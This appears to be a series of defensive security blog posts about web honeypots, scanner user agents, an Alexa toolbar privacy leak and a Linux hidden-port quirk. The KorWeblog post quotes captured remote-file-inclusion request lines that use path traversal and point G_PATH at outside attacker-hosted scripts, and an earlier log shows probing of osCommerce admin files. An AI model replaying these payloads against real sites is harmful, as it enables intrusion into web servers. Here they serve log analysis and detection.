bookmark_borderFaking (all) user agents

If you are going to fake a user agent, do it right 🙂 Seeing some web scanners faking all possible browsers out there in one single request:

  • Firefox/3.6
  • Chrome/9
  • Firefox/3.0
  • Opera/9.99?
  • Safari
  • and more..

This is the actual log (searching for vulnerable oscommerce files):

66.147.240.166 – – [24/May/2012:13:50:50 +0000] “GET /admin/file_manager.php/login.php HTTP/1.1” 404 9152 “-” “Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12\”,\”Mozilla/5.0 (Windows; U; Windows NT 5.1; pl-PL; rv:1.8.1.24pre) Gecko/20100228 K-Meleon/1.5.4\”,\”Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/540.0 (KHTML,like Gecko) Chrome/9.1.0.0 Safari/540.0\”,\”Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Comodo_Dragon/4.1.1.11 Chrome/4.1.249.1042 Safari/532.5\”,\”Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.9.0.16) Gecko/2009122206 Firefox/3.0.16 Flock/2.5.6\”,\”Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.1 (KHTML, like Gecko) Maxthon/3.0.8.2 Safari/533.1\”,\”Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.8pre) Gecko/20070928 Firefox/2.0.0.7 Navigator/9.0RC1\”,\”Opera/9.99 (Windows NT 5.1; U; pl) Presto/9.9.9\”,\”Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-HK) AppleWebKit/533.18.1 (KHTML, like Gecko) Version/5.0.2 Safari/533.18.5\”,\”Seamonkey-1.1.13-1(X11; U; GNU Fedora fc 10) Gecko/20081112\”,\”Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 2.0.50727; SLCC2; .NET CLR

I wonder if it is a bug in their scanners or they did on purpose to bypass user agent restrictions.

bookmark_borderAlexa toolbar and https (not best friends)

For some reason (don’t ask my why), I decided to install the Alexa toolbar for Chrome to try it out. It works well for what it does, and I didn’t see anything wrong with it besides the expected privacy violation (tracking) of them sending all your traffic to their servers.

So every time you visit a site, a request is made to their servers to query the site rank:

192.168.1.X.44210 > 107.22.173.51.80:
GET /data/ABCD?cli=10&ver=alxg-1.1.0&dat=ns&url=http%3A//sucuri.net/ HTTP/1.1
Host: data.alexa.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.91…
Accept: */*

If you are using it, you expect those requests to be made (wich is supposed to be anonymous), so not a problem.

However, I just noticed one big issue is that they also do that for all your HTTPS traffic. So if you are visiting a https site (which would be encrypted in the wire), you are also leaking the sites you are visiting via their rank requests. So if I go to gmail.com (https), a HTTP request is made at the same time:

192.168.1.X.47733 > 23.21.107.170.80:
GET /data/ABCD?cli=10&ver=alxg-1.1.0&dat=ns&url=https%3A//gmail.com HTTP/1.1
Host: data.alexa.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.91…
Accept: */*

I actually thought their plugin (extension) would not work for HTTPS or would at least have a setting to disable it. This is specially bad because now you are leaking all your encrypted traffic browsing for anyone that is watching the wire.

*I know, I know, if you are using that toolbar you probably don’t care about privacy, but it is something to keep in mind. A simple fix is to just remove it and move on.

bookmark_borderGood passwords: It is not about their size or complexity

Every time I read a password recommendation or policy, I get frustrated. It is always about their length and complexity, and they miss the real issue with passwords and how they get compromised.

So I wrote this small (non technical) paper on my thoughts on passwords and how I define a good password: http://dcid.me/texts/good-passwords.

bookmark_borderOSSEC In the Enterprise Presentation Available

Michael Starks from Immutable Security just released his presentation “OSSEC in the Enterprise” (with more than 100 slides). It is very technical and well recommended for everyone interested to learn more about OSSEC.

Link: OSSEC Presentation Available

Direct download: ossec_in_the_enterprise-2009-mstarks.pdf

bookmark_borderChinese hacking and Desinformation warfare

For the last few weeks many articles and news stories were published about the Chinese hacking USA government computers. The reality is that the Chinese have been hacking the US, Russian, Australian (,etc) computers for years, but they are not the only to blame, since the US, Russia and all other countries have been doing the same for a long time.

Why this is news stories now? Richard Bejtlich pointed that it might be for political reasons, but why would a country let the enemy know that they succeeded? Even worse, why would the US air force publish in their own site that the Chinese is the leader in cyber warfare?

That might be a reason… one of the things that I learned from history is that governments use “desinformation warfare” to achieve their goals. My take is that the US gov (and intelligence agencies) setup some honeypots with fake information for the Chinese to hack. The Chinese were successful and now the US gov wants the Chinese to believe that they hacked real information… What’s the best way to make them believe so? Yes, tell the whole world about it..

*Yes, this is not news anymore, but I am still catching up on my reads.
**Sorry for off-topic, back to ossec from now on 🙂

bookmark_borderHow to create a log standard

  1. Get the marketing team together for a clever name.
  2. Copy and paste Microsoft’s IIS W3C log format
  3. Write a press release and tell the world about it

I am not joking, but eIQnetworks released their Open Source Event Logging Standard which fits exactly on my description above. First, they call it “Open Source”. Do they know what open source means? Which OSI approved license did they use? Second, why require a registration to download it? What are they going to do with the information provided? Is it open or not? Lastly, their format is a ugly copy and paste of the Microsoft one. Look at their proposed header:

#Software: eIQ Open Log Format (OLF)
#Version: 1.1
#Date: 02-18-2007 12:14:25 300
#Fields: date time gmt-offset internalIP externalIP virtualdevice..

Look at Microsoft’s:

#Software: Microsoft Internet Information Services 5.1
#Version: 1.0
#Date: 2006-10-09 02:11:51
#Fields: date time c-ip cs-username s-sitename s-computername

I will refrain from commenting further, but you can take a look at it: Open Log Format.

Update 1:Anton Chuvakin and Raffael Marty reviewed their “standard”: chuvakin.blogspot and raffy.ch.

bookmark_borderWeb attacks resource

I have a few honeypots out there just collecting information about web attacks and they have been great to help me improve OSSEC and how it parses web/proxy logs. Since I couldn’t find any public resource dedicated to store this kind of information, I decided to create one at the OSSEC wiki to keep track of them. It is all manual right now, but I plan to automate a lot of work to keep the page current.

I have a few entries with sites storing php/perl bots, common attack patterns, copies of the tools used, etc. If you want to help out keeping it updated, let me know. If you want to share your logs (from real servers or honeypots), it would be great too..

More info: Web attacks links

bookmark_borderBruce Schneier on log analysis

We all respect Bruce Schneier’s opinion (if you don’t be careful) and I found very interesting his take on log analysis:

Whenever someone attacks you, they leave footprints… All of these products have audit logs and they produce audit messages (Millions of messages a day). Most of them are a complete waste of time, like printer out of toner. So what?

But some of them are very important. In those audit logs are footprint of attacks. If you can monitor those on real time you can watch the attacker as he is attacking. If you can understand what is going on fast enough, you can kick him out before he does more damage…

You can watch it here.

bookmark_borderHidden ports on Linux

If you ever had trouble with hidden ports on Linux (2.4 and 2.6), I may have figured out one of the possible causes today (and no, it is not a rootkit). To keep the story short: if you bind any TCP port, but do not listen on it, netstat will not show it at all (the same does not happen with UDP ports).

Here is the idea. If you get this simple C program, it will attempt to bind every TCP port from 1025 to 1050, but it will not listen on them. After it is done, if you do a netstat (or fuser or lsof) nothing will be shown. However, if you try to use the port, you will get an error saying that it is already in use.

To reproduce, download the bind_ports.c program, compile and execute it:

dcid@copacabana:~$ wget http://www.ossec.net/files/other/bind_ports.c
..
14:56:32 (309.92 KB/s) – `bind_ports.c’ saved [1371/1371]

dcid@copacabana:~$ gcc -o bind_ports bind_ports.c
dcid@copacabana:~$ ./bind_ports &
[1] 11332

Ports from 1025 to 1050 were bind..

After that, run netstat (or lsof or fuser) to see if the port is listed (it will not be):

dcid@copacabana:~$ netstat -tan
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 0 0 127.0.0.1:80 0.0.0.0:* LISTEN
tcp 0 0 127.0.0.1:53 0.0.0.0:* LISTEN
…

However, if you try to use the port, you will receive the “already in use” error (if using nc, it takes up to 10 seconds to fail).

dcid@copacabana:~$ nc -l -p 1025
Can’t grab 0.0.0.0:1025 with bind
dcid@copacabana:~$ nc -l -p 1026
Can’t grab 0.0.0.0:1026 with bind
dcid@copacabana:~$ nc -p 1026 127.0.0.1 80
Can’t grab 0.0.0.0:1026 with bind

Anyone has ideas why this happens? If I try the same thing on OpenBSD, netstat lists all the ports correctly.

bookmark_borderHammered by web attacks (KorWeblog)

Some of my web honeypots are being hammered by attacks against KorWeblog. If fact, even my real systems are received a lot of these too.. It looks like they are trying to exploit an old vulnerability (from 2005), which sounds odd to me.

Example of alert from ossec:

OSSEC HIDS Notification.
2007 Jun 27 17:07:30

Received From: xx->/var/log/httpd/xx.access.log
Rule: 31106 fired (level 12) -> “A web attack returned code 200 (success).”
Portion of the log(s):

8.10.120.85 – – [27/Jun/2007:17:07:29 -0300] “GET /install/index.php?lng=../../include/main.inc&G_PATH=http://nicksom2d.sytes.net/ex/echo? HTTP/1.1″ 200 6349 “-” “libwww-perl/5.805″

Just one honeypot (yes, one) in the last few days was “attacked” by the following IPs (25 different):

189.1.168.118
200.193.146.100
200.219.150.6
202.123.27.136
203.55.214.70
207.150.188.50
207.226.179.98
209.216.205.81
210.188.204.198
211.247.239.10
213.194.149.130
216.7.185.31
217.170.66.240
218.228.196.88
218.239.223.225
221.127.101.45
62.193.237.43
62.75.163.196
65.98.58.2
72.232.219.205
8.10.120.85
83.103.57.13
83.217.84.88
85.125.233.222
89.110.144.202

The logs look all the same:

200.193.146.100 – – [26/Jun/2007:16:37:37 -0300] “GET /*install/index.php?lng=../../include/main.inc&G_PATH=http://www.thiaguinho.net/id.txt? HTTP/1.1″ 200 6351 “-” “libwww-perl/5.79″
8.10.120.85 – – [27/Jun/2007:17:07:29 -0300] “GET /install/index.php?lng=../../include/main.inc&G_PATH=http://nicksom2d.sytes.net/ex/echo? HTTP/1.1″ 200 6349 “-” “libwww-perl/5.805″

I posted a few of the sites that were found at the WebAttacks Links in the ossec wiki.